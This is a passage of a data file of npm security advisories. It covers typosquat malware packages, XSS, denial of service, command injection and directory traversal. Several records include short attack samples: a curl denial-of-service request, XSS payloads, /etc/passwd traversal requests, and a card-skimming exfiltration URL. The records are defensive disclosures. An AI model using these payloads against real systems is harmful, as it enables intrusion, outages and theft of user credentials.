+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'requestt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/856'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6x33-pw7p-hmpq,2020-08-31T19:01:05Z,2020-09-04T17:59:49Z,,[],Denial of Service in http-proxy,"Versions of `http-proxy` prior to 1.18.1 are vulnerable to Denial of Service. An HTTP request with a long body triggers an `ERR_HTTP_HEADERS_SENT` unhandled exception that crashes the proxy server. This is only possible when the proxy server sets headers in the proxy request using the `proxyReq.setHeader` function.
+
+For a proxy server running on `http://localhost:3000`, the following curl request triggers the unhandled exception:
+```curl -XPOST http://localhost:3000 -d ""$(python -c 'print(""x""*1025)')""```
+
+
+## Recommendation
+
+Upgrade to version 1.18.1 or later",[],"[{'package': {'ecosystem': 'npm', 'name': 'http-proxy'}, 'ecosystem_specific': {'affected_functions': ['http-proxy.createProxyServer']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/http-party/node-http-proxy/pull/1447/commits/4718119ffbe895aecd9be0d6430357d44b4c7fd3'}, {'type': 'WEB', 'url': 'https://github.com/http-party/node-http-proxy/pull/1447/files'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1486'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9xww-fwh9-95c5,2021-09-30T21:56:44Z,2020-09-02T21:43:59Z,,[],Malicious Package in uglyfi-js,"Version 3.4.6 of `uglyfi-js` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'uglyfi-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/911'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qp6m-jqfr-2f7v,2021-10-01T20:17:24Z,2020-09-04T15:27:11Z,,[],Malicious Package in babel-laoder,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'babel-laoder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/babel/babel-loader'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BABELLAODER-536195'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1348'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5ff8-jcf9-fw62,2021-10-04T20:53:26Z,2020-09-04T17:55:35Z,,[],Cross-Site Scripting in markdown-it-katex,"All versions of `markdown-it-katex` are vulnerable to Cross-Site Scripting (XSS). The package fails to properly escape error messages, which may allow attackers to execute arbitrary JavaScript in a victim's browser by triggering an error.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'markdown-it-katex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/waylonflinn/markdown-it-katex/issues/26'}, {'type': 'PACKAGE', 'url': 'https://github.com/waylonflinn/markdown-it-katex'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1466'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2ggq-vfcp-gwhj,2021-10-04T20:48:50Z,2020-09-04T17:33:53Z,,[],Cross-Site Scripting in @hapi/boom,"Versions of `@hapi/boom` prior t 0.3.8 are vulnerable to Cross-Site Scripting (XSS). The package fails to properly escape error messages, which may allow attackers to execute arbitrary JavaScript in a victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 0.3.8 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@hapi/boom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.8'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/hapijs/boom'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HAPIBOOM-541183'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1459'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4fqg-89cc-5pv5,2021-10-01T17:21:38Z,2020-09-04T14:58:44Z,,[],Malicious Package in sj-labc,"All versions of `sj-labc` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'sj-labc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1315'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fm7r-2pr7-rw2p,2021-09-30T21:57:05Z,2020-09-02T21:45:02Z,,[],Malicious Package in yeoman-genrator,"Version 3.1.1 of `yeoman-genrator` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'yeoman-genrator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/912'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rffp-mc78-wjf7,2020-08-31T18:37:21Z,2020-09-02T18:26:48Z,,[],Command Injection in cocos-utils,"All versions of `cocos-utils` are vulnerable to Remote Code Execution. The `unzip()` function concatenates user input to `exec()` which may allow attackers to execute arbitrary commands on the server.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'cocos-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/829'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pj97-j597-ppm7,2021-09-30T20:30:01Z,2020-09-02T21:15:22Z,,[],Malicious Package in rqeuest,"All versions of `rqeuest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rqeuest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/870'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2pqj-h3vj-pqgw,2023-06-26T17:03:57Z,2020-09-01T16:41:46Z,,['CVE-2012-6708'],Cross-Site Scripting in jquery,"Affected versions of `jquery` are vulnerable to cross-site scripting. This occurs because the main `jquery` function uses a regular expression to differentiate between HTML and selectors, but does not properly anchor the regular expression. The result is that `jquery` may interpret HTML as selectors when given certain inputs, allowing for client side code execution.
+
+## Proof of Concept
+```
+$(""#log"").html(
+ $(""element[attribute=' ']"").html()
+);
+```
+
+
+
+
+## Recommendation
+
+Update to version 1.9.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.8.3'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.8.3'}}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.8.3'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-rails'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2012-6708'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16011'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery/commit/05531fc4080ae24070930d15ae0cea7ae056457d'}, {'type': 'WEB', 'url': 'https://bugs.jquery.com/ticket/11290'}, {'type': 'WEB', 'url': 'https://bugs.jquery.com/ticket/12531'}, {'type': 'WEB', 'url': 'https://bugs.jquery.com/ticket/6429'}, {'type': 'WEB', 'url': 'https://bugs.jquery.com/ticket/9521'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L59'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/v2.2.0/vendor/assets/javascripts/jquery.js#L67'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2012-6708.yml'}, {'type': 'WEB', 'url': 'https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E'}, {'type': 'WEB', 'url': 'https://research.insecurelabs.org/jquery/test/'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450223'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:jquery:20120206'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20200227132049/http://www.securityfocus.com/bid/102792'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/161972/Linksys-EA7500-2.0.8.194281-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-64', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:19:31Z', 'nvd_published_at': '2018-01-18T23:29:00Z'}"
+1.4.0,GHSA-w4vp-3mq7-7v82,2020-08-31T19:01:17Z,2020-09-03T15:49:48Z,,[],Cross-Site Scripting in lazysizes,"Versions of `lazysizes` prior to 5.2.1-rc1 are vulnerable to Cross-Site Scripting. The `video-embed` plugin fails to sanitize the following attributes: data-vimeo, `data-vimeoparams`, `data-youtube` and `data-ytparams`. This allows attackers to execute arbitrary JavaScript in a victim's browser if the attacker has control over the vulnerable attributes.
+
+
+## Recommendation
+
+Upgrade to version 5.2.1-rc1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'lazysizes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.1-rc1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.1-rc0'}}]","[{'type': 'WEB', 'url': 'https://github.com/aFarkas/lazysizes/issues/764'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1493'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-45cp-hpc9-8347,2023-07-27T20:17:34Z,2020-09-01T19:52:35Z,,[],Malicious Package in css_transform_support,"Version 1.0.2 of `css_transform_support` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 1.0.2 of this module is found installed you will want to replace it with a version before or after 1.0.2. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.1",[],"[{'package': {'ecosystem': 'npm', 'name': 'css_transform_support'}, 'versions': ['1.0.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/624'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3wjm-33mw-h388,2023-07-27T20:10:51Z,2020-09-01T20:34:14Z,,[],Malicious Package in s3asy,"Version 0.4.8 of `s3asy` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.4.8 of this module is found installed you will want to replace it with a version before or after 0.4.8. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.4.7",[],"[{'package': {'ecosystem': 'npm', 'name': 's3asy'}, 'versions': ['0.4.8']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/636'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cr5w-6rv4-r2qg,2021-09-30T21:58:48Z,2020-09-03T02:37:45Z,,[],Malicious Package in maleficent,"All versions of `maleficent` contain malicious code. The package is a demonstration of possible risks when installing npm packages. It gathers system information such as: environment variables, OS information, network interface, AWS credentials, npm credentials and ssh keys. The package prints the information to a local file but does not upload it to a remote server.
+
+
+
+## Recommendation
+
+Remove the package from your environment. There is no further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'maleficent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/951'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fgfj-rj24-mj7q,2023-07-27T20:16:43Z,2020-09-02T21:47:08Z,,[],Malicious Package in kraken-api,"Version 0.1.8 of `kraken-api` contains malicious code as a postinstall script. When installed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+
+Users may consider downgrading to version 0.1.7
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",[],"[{'package': {'ecosystem': 'npm', 'name': 'kraken-api'}, 'versions': ['0.1.8']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/914'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5634-rv46-48jf,2020-08-31T18:44:51Z,2020-09-03T17:13:45Z,,[],Cross-Site Scripting in bleach,"All versions of `bleach` are vulnerable to Cross-Site Scripting. It is possible to bypass the package's HTML sanitization with payloads such as `""<script>alert('xss');script>""` regardless of the passed options. This may allow attackers to execute arbitrary JavaScript in the victim's browser.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bleach'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1034'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pxmp-fwjc-4x7q,2021-10-04T20:56:09Z,2020-09-03T15:45:23Z,,[],HTML Injection in marky-markdown,"All versions of `marky-markdown` are vulnerable to HTML Injection due to a validation bypass. The package only allows iframes where the source is `youtube.com` but it is possible to bypass the validation with sources where `youtube.com` is the sub-domain, such as `youtube.com.evil.co`. This
+
+
+## Recommendation
+
+This package is no longer maintained. Please upgrade to `@npmcorp/marky-markdown`",[],"[{'package': {'ecosystem': 'npm', 'name': 'marky-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/npm/marky-markdown'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1471'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2f29-pmpx-vj62,2023-09-07T20:42:00Z,2020-09-01T16:52:33Z,,['CVE-2017-16101'],Directory Traversal in serverwg,"`serverwg` is a simple http server.
+
+`serverwg` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing ""../"" in the URL.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+and response:
+```
+HTTP/1.1 200 OK
+Date: Wed, 17 May 2017 22:52:08 GMT
+Connection: keep-alive
+
+{contents of /etc/passwd}
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'serverwg'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16101'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serverwg'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/364'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8vmc-g99q-xj94,2023-09-11T23:14:26Z,2020-09-01T18:23:52Z,,['CVE-2017-16190'],Directory Traversal in dcdcdcdcdc,"Affected versions of `dcdcdcdcdc` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dcdcdcdcdc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16190'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dcdcdcdcdc'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/439'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9272-59x2-gwf2,2021-10-01T21:04:39Z,2020-09-03T17:04:13Z,,[],Malicious Package in ripedm160,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ripedm160'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1404'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hx3r-jv9q-85jw,2021-10-04T21:16:21Z,2020-09-10T19:44:58Z,,['CVE-2018-17145'],Bitcoin Inventory Out-of-Memory Denial-of-Service Attack (CVE-2018-17145),"There was an easily exploitable uncontrolled memory resource consumption denial-of-service vulnerability that existed in the peer-to-peer network code of three implementations of Bitcoin and several alternative chains.
+
+For more details please see:
+https://invdos.net/
+
+For the paper:
+https://invdos.net/paper/CVE-2018-17145.pdf","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bcoin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bcoin-org/bcoin/security/advisories/GHSA-hx3r-jv9q-85jw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-17145'}, {'type': 'WEB', 'url': 'https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures#CVE-2018-17145'}, {'type': 'PACKAGE', 'url': 'https://github.com/bcoin-org/bcoin'}, {'type': 'WEB', 'url': 'https://github.com/bitcoin/bitcoin/blob/v0.16.2/doc/release-notes.md'}, {'type': 'WEB', 'url': 'https://invdos.net'}, {'type': 'WEB', 'url': 'https://invdos.net/paper/CVE-2018-17145.pdf'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-10T19:44:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2w8q-69fh-9gq6,2021-09-29T21:27:54Z,2020-09-03T22:25:09Z,,[],Malicious Package in bufger-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bufger-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1263'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4wcx-c9c4-89p2,2021-09-30T22:08:42Z,2020-09-11T21:23:30Z,,[],Malicious Package in react-datepicker-plus,"Versions 2.4.3 and 2.4.2 of `react-datepicker-plus` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-datepicker-plus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.2'}, {'fixed': '2.4.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.4.3'}}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/946'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cxcf-78mr-wpg7,2023-07-27T20:11:25Z,2020-09-01T20:29:59Z,,[],Malicious Package in oauth-validator,"Version 1.0.2 of `oauth-validator` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 1.0.2 of this module is found installed you will want to replace it with a version before or after 1.0.2. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.1",[],"[{'package': {'ecosystem': 'npm', 'name': 'oauth-validator'}, 'versions': ['1.0.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/632'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-92px-q4w8-hrr5,2021-09-24T18:30:53Z,2020-09-01T19:56:52Z,,[],Malicious Package in impala,"Version 1.1.7 of `impala` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
